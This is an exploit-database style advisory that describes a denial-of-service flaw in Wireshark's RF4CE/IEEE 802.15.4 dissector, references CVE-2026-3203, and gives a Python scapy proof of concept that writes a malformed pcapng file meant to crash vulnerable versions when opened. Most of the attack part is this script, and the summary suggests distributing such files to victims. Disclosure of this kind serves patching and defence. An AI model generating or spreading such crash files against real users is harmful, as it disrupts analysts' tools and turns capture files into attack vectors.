=============================================================================================================================================
| # Title     : Wireshark 4.6.0–4.6.3 4.4.0–4.4.13 RF4CE Profile via Malformed IEEE 802.15.4 Dissector Crash – Denial of Service            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.wireshark.org/                                                                                                  |
=============================================================================================================================================

[+] Summary    :  A vulnerability in the RF4CE Profile protocol dissector of Wireshark versions 4.6.0–4.6.3 and 4.4.0–4.4.13 allows an attacker 
                  to trigger a Denial of Service (DoS) condition by supplying a specially crafted IEEE 802.15.4 packet capture file.
                  The flaw exists in the handling of malformed RF4CE security-enabled frames. By manipulating security-related fields 
				  and providing inconsistent encrypted payload lengths, the dissector may attempt improper memory operations during 
				  decryption processing (notably in CCM security handling routines). 
				  This can lead to a segmentation fault and application crash when the malicious .
				  pcapng file is opened in a vulnerable Wireshark version.
                  An attacker can exploit this vulnerability by distributing a malicious capture file, which, when analyzed, causes Wireshark to terminate unexpectedly.

[+] POC   :  

from scapy.all import *
from scapy.layers.zigbee import *

output_file = "rf4ce_crash_poc.pcapng"
print(f"[+] Generating Malformed RF4CE Packet to trigger CVE-2026-3203...")
dot154 = Dot154(fcf_frametype=1, fcf_security=1, fcf_panidcomp=1, seqnum=0x42)
dot154_addressing = Dot154Data(dest_panid=0x1234, dest_addr=0x0001, src_addr=0x0002)
rf4ce_nwk = Raw(load=b"\x0c\xff\xff\xff\xff") 
malformed_security_payload = Raw(load=b"\x01" * 50) 
pkt = dot154 / dot154_addressing / rf4ce_nwk / malformed_security_payload
wrpcap(output_file, pkt)
print(f"[+] File '{output_file}' has been created.")
print(f"[!] Warning: Opening this file in Wireshark 4.6.0-4.6.3 will cause a CRASH.")
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================